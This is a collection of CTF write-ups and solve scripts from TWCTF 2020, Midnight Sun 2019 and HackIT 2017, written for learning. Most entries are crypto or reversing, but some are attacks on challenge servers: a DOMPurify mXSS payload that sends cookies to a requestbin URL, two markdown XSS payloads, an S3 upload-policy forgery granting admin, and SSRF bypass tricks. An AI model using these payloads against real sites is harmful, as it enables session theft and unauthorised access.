 8 | The website allows a user to upload some brainfuck code and executes it when visited. The backend code is not that important, but can be viewed using [https://bfnote.chal.ctf.westerns.tokyo/?source](https://bfnote.chal.ctf.westerns.tokyo/?source)
 9 | 
10 | The user input is sanitized using `DOMPurify`. We did some DOM clobbering to overwrite `CONFIG`and set `unsafeRender`, but had no idea how to solve this challenge. The next morning we started to look at it again. One of our team members noticed that 10 minutes before cure53 [tweeted](https://twitter.com/cure53berlin/status/1307602849455640576) about a new release that fixed a mXSS variation. That was unfortunate, but since it was a competetion we just did a git diff and found the payload in a test.
11 | ```js
12 | {
13 |       "title": "Tests against nesting-based mXSS behavior 2/2",
14 |       "payload": "<math><mtext><table><mglyph><style><math>CLICKME</math>",
15 |       "expected": [
16 |           ""
17 |       ]
18 | }
19 | ```
20 | 
21 | Based on this we created a simple payload to exfiltrate the cookie:
22 | ```html
23 | <math><mtext><table><mglyph><style><math><img src="1" onerror="document.location.href=window.a.href+document.cookie"></math><a id=a href="//requestbin.net/r/y3usnuy3/"></a>
24 | ```
25 | 
26 | ## Flag
27 | ```
28 | TWCTF{reCAPTCHA_Oriented_Programming_with_XSS!}
29 | ```


--------------------------------------------------------------------------------
/2020/twctf/xor-shift-enc/gen.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import numpy as np
 3 | import scipy as sp
 4 | import scipy.linalg
 5 | import sys
 6 | 
 7 | try:
 8 |     from tqdm import tqdm
 9 | except ImportError:
10 |     def tqdm(it, *args, **kwargs):
11 |         return it
12 | 
13 | 
14 | NBITS = 64
15 | NSTATE = 64
16 | 
17 | 
18 | def zero():
19 |     return np.zeros((NBITS, NBITS), dtype="int8")
20 | 
21 | 
22 | def identity():
23 |     return np.eye(NBITS, dtype="int8")
24 | 
25 | 
26 | def shift_left_matrix(by):
27 |     return np.eye(NBITS, k=by, dtype="int8")
28 | 
29 | 
30 | def step_matrix():
31 |     a = 3
32 |     b = 13
33 |     c = 37
34 |     s0 = identity()
35 |     s1 = identity()
36 |     s1 = s1 + s1 @ shift_left_matrix(a)
37 |     res_s0 = s0 + s0 @ shift_left_matrix(-c)
38 |     res_s1 = s1 + shift_left_matrix(-b) @ s1
39 |     return np.hstack([res_s0, res_s1]) & 1
40 | 
41 | 
42 | def step_matrix_all_0():
43 |     sm = np.vstack(
44 |         [
45 |             np.hstack([identity(), zero()]),
46 |             step_matrix(),
47 |         ]
48 |     )
49 | 
50 |     complete_diag = [sm] + [identity()] * (NSTATE - 2)
51 |     return sp.linalg.block_diag(*complete_diag)
52 | 
53 | 
54 | def step_matrix_all_mod(mod):
55 |     if mod % NSTATE != mod:
56 |         raise ValueError("mod must be between 0 and 63 (incl.)")
57 | 
58 |     return np.roll(step_matrix_all_0(), mod * NBITS, axis=(0, 1))
59 | 
60 | 
61 | with np.printoptions(threshold=np.inf):
62 |     for i in tqdm(range(NSTATE)):
63 |         with open("step{}.json".format(i), "w") as f:
64 |             json.dump(step_matrix_all_mod(i).tolist(), f)
65 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/dr-evil/dr-evil.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | tags: ["misc"]
 3 | author: "CherryWorm"
 4 | ---
 5 | # Challenge
 6 | We have managed to intercept communications from Dr. Evil's base but it seems to be encrypted. Can you recover the secret message.
 7 | 
 8 | # Solution
 9 | After activating TCP checksum validation in wireshark, we noticed that approximately half of all TCP packets have a broken checksum. Coincidentally, every packet with a faulty checksum had the reserved bit set. The reserved bit is sometimes called the "evil" bit, since it there is no reason for it to be set, and some servers straight up drop a connection if it is.
10 | 
11 | The following script extracts all evil bits from the packets the server sent and concatenates them:
12 | 
13 | ```python
14 | from scapy.all import *
15 | import binascii
16 | 
17 | pcap = rdpcap('dr-evil.pcap')
18 | res = []
19 | 
20 | for packet in pcap:
21 |     if IP in packet and packet[IP].src == '52.15.194.28':
22 |         res.append(packet[IP].flags == 'evil')
23 | 
24 | # print boolean array as ascii (extra 0 because the string did not have even length)
25 | print(binascii.unhexlify('%x0' % int(''.join(map(lambda b: '1' if b else '0', res)), 2)).decode())
26 | ```
27 | 
28 | This prints the string 
29 | ```
30 | Ladies and gentlemen, welcome to my underground lair. I have gathered here before me the world's deadliest assassins. And yet, each of you has failed to kill Austin Powers and submit the flag "midnight{1_Milli0n_evil_b1tz!}". That makes me angry. And when Dr. Evil gets angry, Mr. Bigglesworth gets upset. And when Mr. Bigglesworth gets upset, people DIE!!
31 | ```
32 | which contains the flag `midnight{1_Milli0n_evil_b1tz!}`.


--------------------------------------------------------------------------------
/2020/twctf/mask/mask.py:
--------------------------------------------------------------------------------
 1 | s = '''192.168.55.86/255.255.255.0
 2 | 192.168.80.198/255.255.255.128
 3 | 192.168.1.228/255.255.255.128
 4 | 192.168.90.68/255.255.254.0
 5 | 192.168.8.214/255.255.255.128
 6 | 192.168.5.197/255.255.255.128
 7 | 192.168.71.90/255.255.255.0
 8 | 192.168.62.55/255.255.255.192
 9 | 192.168.78.209/255.255.255.128
10 | 192.168.76.216/255.255.255.128
11 | 192.168.91.202/255.255.255.128
12 | 192.168.93.108/255.255.255.0
13 | 192.168.74.76/255.255.254.0
14 | 192.168.10.88/255.255.254.0
15 | 192.168.82.236/255.255.255.128
16 | 192.168.13.246/255.255.255.128
17 | 192.168.99.228/255.255.255.128
18 | 192.168.68.83/255.255.252.0
19 | 192.168.23.113/255.255.255.192
20 | 192.168.52.113/255.255.255.192
21 | 192.168.69.99/255.255.255.0
22 | 192.168.19.114/255.255.255.192
23 | 192.168.53.236/255.255.255.128
24 | 192.168.90.117/255.255.254.0
25 | 192.168.35.90/255.255.255.0
26 | 192.168.91.121/255.255.255.0
27 | 192.168.48.49/255.255.255.192
28 | 192.168.27.104/255.255.255.0
29 | 192.168.98.204/255.255.255.128
30 | 192.168.93.87/255.255.255.0
31 | 192.168.44.113/255.255.255.192
32 | 192.168.40.104/255.255.248.0
33 | 192.168.25.227/255.255.255.128
34 | 192.168.57.50/255.255.255.192
35 | 192.168.97.115/255.255.255.0
36 | 192.168.30.47/255.255.255.192
37 | 192.168.10.102/255.255.254.0
38 | 192.168.51.209/255.255.255.128
39 | 192.168.82.125/255.255.255.192
40 | 192.168.72.125/255.255.255.192'''
41 | 
42 | def parse_ip(s):
43 |     return [int(i) for i in s.split('.')]
44 | 
45 | pairs = [[parse_ip(ip) for ip in line.split('/')] for line in s.split()]
46 | 
47 | result = b''
48 | for ip, mask in pairs:
49 |     result += bytes([ip[3] & ~mask[3]])
50 | print(result)
51 | 


--------------------------------------------------------------------------------
/2020/twctf/sqrt/writeup.md:
--------------------------------------------------------------------------------
 1 | # sqrt
 2 | Category: Crypto
 3 | 
 4 | Solves: 45, Score: 216
 5 | 
 6 | No Description, two attached files: [chall.py](./chall.py) and [output.txt](./output.txt)
 7 | 
 8 | 
 9 | ## Solution
10 | Investigating `chall.py` quickly reveals that the flag is 42 characters long. It is converted to an integer `f`, then squared 64 times modulo a known prime `p`.
11 | 
12 | ```
13 | ct = f ** (2 ** 64) mod p
14 | ```
15 | 
16 | The challenge is conceptually really simple. Just take 64 square roots of `ct` to find `f` again. The problem is that each of these roots has two solutions. We do not know which one is the correct one, until we reach the final iteration and can check the flag format. This means a simple search would need `2**64` decisions, which is unfeasable.
17 | 
18 | This can be improved upon a lot by considering the order of the multiplicative group of `f` in `mod p`. It is always `p-1`, which can be factored into `2**30 * q`, with `q` another large prime. Now consider:
19 | 
20 | ```
21 | p  = (2 ** 30) * q
22 | ct = f ** (2 ** 64) mod p
23 | ct = f ** (2 ** 64 + k*(p-1)) mod p
24 | ct = f ** (2 ** 64 + k*(2 ** 30 * q)) mod p
25 | ct = f ** (2 ** 30) ** (2 ** 34 + k*q) mod p
26 | ct = f ** (2 ** 30) ** (d) mod p
27 | ```
28 | 
29 | Since `d` and `p-1` are coprime, we can invert it, and are left with only the 30th square of `f`, which is feasable to bruteforce:
30 | 
31 | ```
32 | di = d ** (-1) mod (p-1)
33 | f ** (2 ** 30) = ct ** di mod p
34 | ```
35 | 
36 | Using an unoptimized, but multi-threaded bruteforce took around 10 minutes on 48 hyperthreads. A single-threaded solution is attached in [solve.sage](./solve.sage)
37 | 
38 | ### Flag
39 | `TWCTF{17s_v3ry_34sy_70_f1nd_th3_n_7h_r007}`


--------------------------------------------------------------------------------
/2020/twctf/does_linux_dream_of_windows/writeup.md:
--------------------------------------------------------------------------------
 1 | # Does Linux Dream of Windows?
 2 | 
 3 | Flag1: Solves: 7, Score: 163  
 4 | Flag2: Solves: 1, Score: 400
 5 | 
 6 | > Tux is dreaming of Windows.
 7 | [http://dream.chal.ctf.westerns.tokyo](http://dream.chal.ctf.westerns.tokyo)
 8 | 
 9 | The server is running a `ASP.NET` website on `ubuntu` using `Apache 2`. To get the first flag we have to get the content of `upload.aspx`, `upload.aspx.cs` and `Web.config`. Apache checks for the file extension when doing a request. If it is in a special list, the requests gets forwarded to `ASP.NET`. Otherwise the server responds with the raw content. We tried several thing, the website allows a user to upload files, but all extensions that would be interpreted by `ASP.NET` are blacklisted. Later a hint got released: `Hint2 (2020-09-19 20:00:00 UTC): Did you try "Back To Top" from upload.aspx? What's happening?` We did what the hint suggests and noticed that the url ends with `INDEX.HTM`. We have known of some weird behavior when using unicode and character case conversion, but we never thought it would work, just tried, because nothing had worked. It worked. There are some unicode characters that get when converted to upper/lower case "normal" ASCII. For example the german `ß` when converted to upper-case becomes `SS`. We found a writeup on google with a list of other characters like that, but lost the link to it. Those are the URLs we used.
10 | 
11 | ```
12 | http://dream.chal.ctf.westerns.tokyo/upload.a%C5%BFpx
13 | http://dream.chal.ctf.westerns.tokyo/upload.a%C5%BFpx.c%C5%BF
14 | http://dream.chal.ctf.westerns.tokyo/Web.con%EF%AC%81g
15 | ```
16 | 
17 | ## Flag1
18 | 
19 | ```
20 | TWCTF{f29941def1f24f2c1e15ba36390e1302a61614bfc698267bc4a13485d6ae}
21 | ```


--------------------------------------------------------------------------------
/2020/twctf/urlcheck.md:
--------------------------------------------------------------------------------
 1 | ## urlcheck v1
 2 | 
 3 | This task was a flask app that allows requesting URLs if:
 4 | - `urlparse(url).netloc` is an IPv4 address (regex match)
 5 | - the IP is not a local IP, based on a series of tests for local address ranges
 6 | 
 7 | The app also includes an endpoint that returns the flag if it's requested from 127.0.0.1.
 8 | 
 9 | Notably, the URL is parsed two times:
10 | - by `urllib.parse.urlparse` for the regex check
11 | - and `requests` (which is using `urllib3.util.parse_url` internally) for the requests
12 | 
13 | We tried exploiting the difference between these URL parsers but couldn't get the URLs to pass the regex check.
14 | 
15 | We googled a bit and found a page that talked about URL parsers and blocklist bypasses. This bypass works:
16 | 
17 | `0177.0.0.1`
18 | 
19 | It's matched by the regex (`^\d+\.\d+\.\d+\.\d+$`) and the check function parses it to `[177, 0, 0, 1]`, which is allowed.
20 | When passed to the operating system though (`getaddrinfo`, ..), the leading zero marks the first octet as octal (with 0o177 == 127), and requests localhost.
21 | 
22 | This doesn't feel like it's the intended solution though as it does not depend on the two Python URL parsers in use.
23 | 
24 | ## urlcheck v2
25 | 
26 | Similar setup to urlcheck v1, but:
27 | - IP is not checked by regex anymore
28 | - IP whitelist based on `ipaddress.ip_address(x).is_global`
29 | - FQDN is resolved using `socket.gethostbyname` before checking IP address
30 | - requests.get if IP is allowed
31 | 
32 | Setup looks a lot like we'll need to exploit parser differences (`requests` vs `gethostbyname`), but:
33 | - name is resolved by gethostbyname and requests (=> twice!)
34 | - we tried dns rebinding (https://lock.cmpxchg8b.com/rebinder.html is nice)
35 | - it worked
36 | - probably not the intended solution though


--------------------------------------------------------------------------------
/2017/HackIT-rev200.md:
--------------------------------------------------------------------------------
 1 | # Rev200 
 2 | 
 3 | **Description:** You haxor, come on you little sciddie... debug me, eh? You fucking little lamer... You fuckin' come on, come debug me! I'll get your ass, you jerk! Oh, you IDA monkey! Fuck all you and your tools! Come on, you scum haxor, you try to reverse me? Come on, you asshole!!
 4 | 
 5 | First of all: The task wasn't even worth 50 points and was solved in 3 min. As a little sciddie i used IDA to decompile the checking algo (algo()):
 6 | ```
 7 | for ( i = 0; i <= 19; ++i )
 8 |     v4[i] = *(_BYTE *)(i + a1);
 9 |   for ( j = 20; j <= 39; ++j )
10 |     v3[j - 20] = *(_BYTE *)(j + a1);
11 |   for ( k = 0; k <= 19; ++k )
12 |   {
13 |     v4[k] = (((((v4[k] ^ 0xC) + 6) ^ 0xD) + 7) ^ 0xE) + 8;
14 |     v3[k] = (((((v3[k] ^ 0xF) + 9) ^ 0x10) + 10) ^ 0x11) + 11;
15 |   }
16 |   for ( l = 0; l <= 19; ++l )
17 |     v2[l] = v4[l];
18 |   for ( m = 20; m <= 39; ++m )
19 |     v2[m] = v3[m - 20];
20 |   if ( memcmp((__int64)v2, (__int64)&correct, 160) )
21 |     result = Print(L"\nWrong\n");
22 |   else
23 |     result = Print(L"\nCorrect\n");
24 |   return result;
25 | ```
26 | Wow, static XOR on a each single byte that is compared to some static memory.
27 | 
28 | Simple python solution:
29 | ```
30 | # Solution for rev200
31 | correct = [104, 60, 121, 113, 99, 124, 129, 146, 146, 101, 101, 147, 146, 73, 121, 146, 56, 108, 60, 111, 123, 135, 88, 85, 137, 90, 89, 126, 126, 107, 135, 108, 87, 108, 107, 88, 89, 90, 90, 111];
32 | correctS = "";
33 | 
34 | for x in range(20):
35 | 	for i in range(256):
36 | 		if ((((((i ^ 0xC) + 6) ^ 0xD) + 7) ^ 0xE) + 8) == correct[x]:
37 | 			correctS += chr(i)
38 | 
39 | for x in range(20):
40 | 	for i in range(256):
41 | 		if (((((i ^ 0xF) + 9) ^ 0x10) + 10) ^ 0x11) + 11 == correct[x+20]:
42 | 			correctS += chr(i)
43 |    
44 | print correctS
45 | ```
46 | 
47 | Flag: h4ck1t{ff77af3cf8d4e1e67c4300aeb5ba6344}
48 | 
49 |   
50 | 
51 | 


--------------------------------------------------------------------------------
/2020/twctf/twin-d/twin-d.md:
--------------------------------------------------------------------------------
 1 | # Twin-D
 2 | 
 3 | In this challenge, we got an RSA-encrypted message (with 2048 bit modulus) plus two public exponents that were generated from correlated private exponents. The first private exponent is a random 1024 bit number `d` but the second one is `d + 2`.
 4 | 
 5 | There are two issues here:
 6 | 
 7 | - we get two public exponents generated from a single random private exponent
 8 | - the private exponent is not very large compared to the modulus (only half the bits)
 9 | 
10 | We spent quite some time trying to find a way to exploit the small private exponent.
11 | But most attacks require an even smaller private exponent (about 1/4 the size of the modulus).
12 | It turns out that the solution is much simpler than that.
13 | 
14 | We know that these equations hold, because that's how public/private exponents are related in RSA:
15 | 
16 | ```
17 | phi = (p-1) * (q-1)  # euler phi function
18 | d       * e1    === 1 (mod phi)
19 | 
20 | (d + 2) * e2    === 1 (mod phi)
21 | d * e2 + 2 * e2 === 1 (mod phi)
22 | ```
23 | 
24 | Multiplying the first equation by `e2` and the second by `e1` and then subtracting the first from the second leads to:
25 | 
26 | ```
27 | 2 * e1 * e2           === e1 - e2 (mod phi)
28 | 2 * e1 * e2 + e2 - e1 === 0       (mod phi)
29 | ```
30 | 
31 | So we know that `kphi = 2 * e1 * e2 + e2 - e1` is a multiple of `phi`.
32 | That means that we can simply invert `e1` modulo `kphi` (this works because `e1` happens to be coprime to `kphi`) to recover a private exponent `d`.
33 | We can then decrypt the flag with that `d`. In python:
34 | 
35 | ```python
36 | from json import load
37 | params = load(open("output"))
38 | n, e1, e2, enc = [int(params[k]) for k in ("n", "e1", "e2", "enc")]
39 | kphi = 2 * e1 * e2 + e2 - e1
40 | dec = pow(enc, pow(e1, -1, kphi), n)
41 | bytes.fromhex(format(dec, 'x'))
42 | 
43 | # b'TWCTF{even_if_it_is_f4+e}\n'
44 | ```
45 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/marcozuckerbergo/marcozuckerbergo.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | tags: ["xxs", "mermaidjs"]
 3 | ---
 4 | # Challenge
 5 | > Fine, I'll use a damn lib. Let's see if it's any better.
 6 | 
 7 | This challenge is based on the same setup as marcodowno. Instead of converting markdown, this challenge converts [mermaidjs](https://mermaidjs.github.io/) charts to HTML.
 8 | 
 9 | # Solution
10 | 
11 | Let's have a look at the first example on the mermaidjs page and check how it its parsed.
12 | 
13 | ```
14 | graph TD;
15 |     A-->B;
16 | ```
17 | 
18 | This input is parsed using the [flowchart parser](https://github.com/knsv/mermaid/blob/master/src/diagrams/flowchart/parser/flow.jison) written in a bison-like language.
19 | A few of the parsing rules look promising:
20 | 
21 | `textToken` consumes a bunch interesting characters that are dumped as-is into the HTML output:
22 | ```<>[]"'`:.-```
23 | The `textToken` rule is used to parse vertex names in the link statement `A-->B`.
24 | Parentheses are not allowed though so we'll have to improvise on the `alert(1)` call:
25 | 
26 | [Template literals](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals) can be used to call functions without using parentheses.
27 | ```alert`1` ``` is equivalent to `alert(["1"])` and by string coercion equivalent to `alert('1')`.
28 | 
29 | Here's the final payload:
30 | 
31 | ```
32 | graph LR;
33 |     X-->Y[Y<img src=x onerror='alert`1`' />];
34 | ```
35 | 
36 | This is the relevant output produced:
37 | 
38 | ```html
39 | <div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; white-space: nowrap;">Y<img src="x" onerror="alert`1`"></div>
40 | ```
41 | 
42 | http://marcozuckerbergo-01.play.midnightsunctf.se:3002/markdown?input=%67%72%61%70%68%20%4c%52%3b%0a%20%20%20%20%58%2d%2d%3e%59%5b%59%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%27%61%6c%65%72%74%60%31%60%27%20%2f%3e%5d%3b
43 | 
44 | midnight{1_gu3zz_7rust1ng_l1bs_d1dnt_w0rk_3ither:(}
45 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/cloudb/exploit.py:
--------------------------------------------------------------------------------
 1 | import hmac
 2 | import hashlib
 3 | import requests
 4 | import urllib
 5 | import json
 6 | 
 7 | email = "somerandomemail@yourprovider.abcde"
 8 | password = "supersecretpassword!!!"
 9 | 
10 | # Used to create the password
11 | def createHMAC(email, password):
12 |     return hmac.new("[object Object]", email+password, digestmod=hashlib.sha256).hexdigest()
13 | 
14 | # Create hmac, then download the policy
15 | def getSignedJSON(d):
16 |     digest = hmac.new("[object Object]", d, digestmod=hashlib.sha256).hexdigest()
17 |     enc = urllib.urlencode({'acl': d, 'hmac': digest})
18 |     return requests.get("http://cloudb-01.play.midnightsunctf.se/signature?"+enc).text.split(":")
19 | 
20 | # Get the signed JSON policy, which allows us to write anywhere into every bucket the signer has access to
21 | data = getSignedJSON("public-read-write'}],'conditions': [['starts-with', '$bucket', ''],['starts-with', '$key', ''],{'acl': 'public-read-write'}],'Conditions': [{'acl': 'public-read-write")
22 | 
23 | # Upload our new user JSON with admin set to `true`
24 | r = requests.post("https://cloudb-users.s3.amazonaws.com/", data={"acl": "public-read-write", "AWSAccessKeyId": "AKIAJQSA73ND6ITM5ETQ", "Policy": data[0], "Signature": data[1], 'key': "users/%s/info.json"%email}, files={"file": json.dumps({"admin": True, "hmac": createHMAC(email, password), "name": "SomeNameHere", "email": email})})
25 | assert r.status_code == 204
26 | 
27 | # Log in as admin and get the flag
28 | print "Flag:", requests.post("http://cloudb-01.play.midnightsunctf.se/admin", data={"email": email, "password": password, "hmac": createHMAC(email, password+"adminlogin")}).text
29 | 
30 | # Set admin to `false` again
31 | r = requests.post("https://cloudb-users.s3.amazonaws.com/", data={"acl": "public-read-write", "AWSAccessKeyId": "AKIAJQSA73ND6ITM5ETQ", "Policy": data[0], "Signature": data[1], 'key': "users/%s/info.json"%email}, files={"file": json.dumps({"admin": False, "hmac": createHMAC(email, password), "name": "SomeNameHere", "email": email})})
32 | assert r.status_code == 204
33 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/hfsmbr/hfsmbr.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | tags: ["re", "16bit"]
 3 | author: "bennofs"
 4 | ---
 5 | # Challenge
 6 | > We made a military-grade secure OS for HFS members. Feel free to beta test it for us! 
 7 | 
 8 | The challenge is a qemu image, which displays after startup:
 9 | 
10 | ```
11 | .
12 | 
13 | [HFS SECURE BOOT] Loading  ...
14 | .-. .-.----.----.   .-.   .-.----..----.  
15 | | {_} | {_{ {__     |  `.'  | {}  | {}  } 
16 | | { } | | .-._} }   | |\ /| | {}  | .-. \ 
17 | `-' `-`-' `----'    `-' ` `-`----'`-' `-' 
18 | Enter the correct password to unlock the Operating System
19 | [HFS_MBR]> 
20 | ```
21 | 
22 | # Solution
23 | The image starts with a boot loader that loads sectors 4 and 5 to address 0x7e00 and then jumps there. Let's extract those using dd:
24 | 
25 | ```
26 | $  dd if=dos.img of=stage2.bin skip=3 count=2
27 | ```
28 | 
29 | The code to check password is at address `0x7e37`. Here's an annotated version:
30 | 
31 | ```
32 | 0000:7e37                 b701  mov bh, 1 
33 | 0000:7e39                 b400  mov ah, 0
34 | 0000:7e3b                 cd16  int 0x16         ; read character into al
35 | 0000:7e3d                 3c61  cmp al, 0x61   
36 | 0000:7e3f             0f8cc101  jl 0x8004        ; if character is < 0x61 ('a'), halt
37 | 0000:7e43                 3c7a  cmp al, 0x7a
38 | 0000:7e45             0f8fbb01  jg 0x8004        ; if character is > 0x7a ('z'), halt
39 | 0000:7e49                 b40e  mov ah, 0xe
40 | 0000:7e4b                 cd10  int 0x10         ; print the entered character
41 | 0000:7e4d                 30e4  xor ah, ah
42 | 0000:7e4f                 88c2  mov dl, al
43 | 0000:7e51                 2c61  sub al, 0x61
44 | 0000:7e53                 d0e0  shl al, 1
45 | 0000:7e55                 31db  xor bx, bx
46 | 0000:7e57                 88c3  mov bl, al
47 | 0000:7e59               b82680  mov ax, 0x8026
48 | 0000:7e5c                 01c3  add bx, ax
49 | 0000:7e5e                 8b07  mov ax, word [bx] ; load from 0x8026 + 2*(char - 0x61)
50 | 0000:7e60                 ffe0  jmp ax            ; jump to that address
51 | ```
52 | 
53 | Analysis of the 24 different handlers referenced at 0x8026 reveals that the correct password is `sojupwner`.
54 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/marcodowno/marcodowno.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | tags: ["xxs"]
 3 | ---
 4 | # Challenge
 5 | > Someone told me to use a lib, but real developers rock regex one-liners.
 6 | 
 7 | This challenge provides a website that converts markdown to html for display.
 8 | The conversion code is implemented with a bunch of regex search-and-replaces.
 9 | The task here is to find input markdown that invokes `alert(1)` once converted to html.
10 | 
11 | ```js
12 | function markdown(text){
13 |   text = text
14 |   .replace(/[<]/g, '')
15 |   .replace(/----/g,'<hr>')
16 |   .replace(/> ?([^\n]+)/g, '<blockquote>$1</blockquote>')
17 |   .replace(/\*\*([^*]+)\*\*/g, '<b>$1</b>')
18 |   .replace(/__([^_]+)__/g, '<b>$1</b>')
19 |   .replace(/\*([^\s][^*]+)\*/g, '<i>$1</i>')
20 |   .replace(/\* ([^*]+)/g, '<li>$1</li>')
21 |   .replace(/##### ([^#\n]+)/g, '<h5>$1</h5>')
22 |   .replace(/#### ([^#\n]+)/g, '<h4>$1</h4>')
23 |   .replace(/### ([^#\n]+)/g, '<h3>$1</h3>')
24 |   .replace(/## ([^#\n]+)/g, '<h2>$1</h2>')
25 |   .replace(/# ([^#\n]+)/g, '<h1>$1</h1>')
26 |   .replace(/(?<!\()(https?:\/\/[a-zA-Z0-9./?#-]+)/g, '<a href="$1">$1</a>')
27 |   .replace(/!\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#]+)\)/g, '<img src="$2" alt="$1"/>')
28 |   .replace(/(?<!!)\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#-]+)\)/g, '<a href="$2">$1</a>')
29 |   .replace(/`([^`]+)`/g, '<code>$1</code>')
30 |   .replace(/```([^`]+)```/g, '<code>$1</code>')
31 |   .replace(/\n/g, "<br>");
32 | 
33 |   return text;
34 | }
35 | ```
36 | 
37 | # Solution
38 | 
39 | One of the regexes looks particularly scary:
40 | ```js
41 | .replace(/!\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#]+)\)/g, '<img src="$2" alt="$1"/>')
42 | ```
43 | The first capture group (the alt text) allows for all characters including quotes.
44 | This can easily be used to insert custom attributes and invoke custom javascript:
45 | ```js
46 | > markdown("![alt\" onerror=\"javascript:alert(1)](https://src)")
47 | '<img src="https://src" alt="alt" onerror="javascript:alert(1)"/>'
48 | ```
49 | 
50 | http://marcodowno-01.play.midnightsunctf.se:3001/markdown?input=%21%5Balt%22%20onerror%3D%22javascript%3Aalert%281%29%5D%28https%3A%2F%2Fsrc%29
51 | 
52 | midnight{wh0_n33ds_libs_wh3n_U_g0t_reg3x?}
53 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/hfs-vm/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | # mov reg, value
 4 | def op_move_imm(dst, val):
 5 |     return p32((val << 16) | (dst << 5) | 0x2000 | 0x0)
 6 | 
 7 | # mov regA, regB
 8 | def op_move(dst, src):
 9 |     return p32((src << 16) | (dst << 5) | 0x0)
10 | 
11 | # add regA, value
12 | def op_add_imm(dst, val):
13 |     return p32((val << 16) | (dst << 5) | 0x2000 | 0x1)
14 | 
15 | # add regA, regB
16 | def op_add(dst, src):
17 |     return p32((src << 16) | (dst << 5) | 0x1)
18 | 
19 | # sub regA, value
20 | def op_sub_imm(dst, val):
21 |     return p32((val << 16) | (dst << 5) | 0x2000 | 0x2)
22 | 
23 | # sub regA, regB
24 | def op_sub(dst, src):
25 |     return p32((src << 16) | (dst << 5) | 0x2)
26 |     
27 | # xchg regA, regB
28 | def op_xchg(dst, src):
29 |     return p32((src << 9) | (dst << 5) | 0x3)
30 |     
31 | # xor regA, value
32 | def op_xor_imm(dst, val):
33 |     return p32((val << 16) | (dst << 5) | 0x2000 | 0x4)
34 | 
35 | # xor regA, regB
36 | def op_xor(dst, src):
37 |     return p32((src << 16) | (dst << 5) | 0x4)
38 |     
39 | # push value
40 | def op_push_imm(val):
41 |     return p32((val << 16) | 0x2000 | 0x5)
42 | 
43 | # push regA
44 | def op_push(reg):
45 |     return p32((reg << 5) | 0x5)
46 |     
47 | # pop regA
48 | def op_pop(reg):
49 |     return p32((reg << 5) | 0x6)
50 | 
51 | # Missing: Stack set relative (can be used to get RCE)
52 | #          Stack get relative (can be used to leak pointers)
53 | #          No bounds checking for both
54 | 
55 | # syscall number
56 | def op_syscall(num):
57 |     return op_move_imm(1, num) + p32(9)
58 |     
59 | # Show all registers + stack
60 | def op_showregs():
61 |     return p32(0xA)
62 | 
63 | # Reserve some space on the stack, syscall 3 (get flag), syscall 1 (print stack), reset stack
64 | def get_flag():
65 |     return op_sub_imm(14, 0xB) + op_syscall(3) + op_syscall(1) + op_add_imm(14, 0xB)
66 | 
67 | bytecode = [
68 |     get_flag()
69 | ]
70 | 
71 | bytecode = "".join(bytecode)
72 | 
73 | r = remote("hfs-vm-01.play.midnightsunctf.se", 4096)
74 | r.recvuntil("Input byte code length: ")
75 | r.sendline(str(len(bytecode)))
76 | r.recvuntil("Input byte code: ")
77 | r.send(bytecode)
78 | print r.recvall()
79 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/temp.cs:
--------------------------------------------------------------------------------
 1 |  public static byte[] encryptBlock(byte[] block, byte[,] matrix)
 2 |         {
 3 |             int i = 0;
 4 | 
 5 |             while (true)
 6 |             {
 7 |                 if (!(i < block.Length))
 8 |                     return block;
 9 | 
10 |                 var b1 = block[i];
11 |                 var b2 = block[i + 1];
12 | 
13 |                 byte b1_x = 0;
14 |                 byte b1_y = 0;
15 |                 byte b2_x = 0;
16 |                 byte b2_y = 0;
17 | 
18 |                 byte x = 0;
19 |                 byte y = 0;
20 | 
21 |                 while (y < 16)
22 |                 {
23 |                     x = 0;
24 |                     while (x < 16)
25 |                     {
26 |                         if (matrix[y,x] == b1)
27 |                         {
28 |                             b1_x = x;
29 |                             b1_y = y;
30 |                         }
31 |                         else
32 |                         {
33 |                             if (matrix[y,x] == b2)
34 |                             {
35 |                                 b2_x = x;
36 |                                 b2_y = y;
37 |                             }
38 |                         }
39 |                         x += 1;
40 |                     }
41 |                     y += 1;
42 |                 }
43 | 
44 |                 if (b1_x == b2_x && b1_y == b2_y)
45 |                 {
46 |                     
47 |                 }
48 |                 else
49 |                 {
50 |                     if (b1_y == b2_y)
51 |                     {
52 |                         b1_x += 1;
53 |                         b2_x += 1;
54 | 
55 |                         if (b1_x >= 16) b1_x = 0;
56 |                         if (b2_x >= 16) b2_x = 0;
57 |                     }
58 |                     else
59 |                     {
60 |                         byte tmp = b1_x;
61 |                         b1_x = b2_x;
62 |                         b2_x = tmp;
63 |                     }
64 |                 }
65 | 
66 |                 block[i] = matrix[b1_y,b1_x];
67 |                 block[i + 1] = matrix[b2_y,b2_x];
68 | 
69 |                 i += 2;
70 |             }
71 |         }


--------------------------------------------------------------------------------
/2020/twctf/xor-shift-enc/xor-shift-enc.md:
--------------------------------------------------------------------------------
 1 | xor_shift_enc
 2 | =============
 3 | 
 4 | This task provides a custom pseudo-random number generator (PRNG) with a `jump` method that's been deleted from the source.
 5 | It also includes a test for the behaviour of `jump`: The test esentially requires that `jump(n)` advances the PRNG by `n` `randgen` calls.
 6 | 
 7 | As a cheap shot, we can implement `jump` using `for _ in range(n): randgen()`.
 8 | This works (and starts printing the flag), but is exponentially slower for each character of the flag text.
 9 | We'll have to implement a faster version of `jump`.
10 | 
11 | Searching for `PRNG jump` leads to:
12 | 
13 | - The PCG family of PRNGs which implement this operation (https://www.pcg-random.org/useful-features.html)
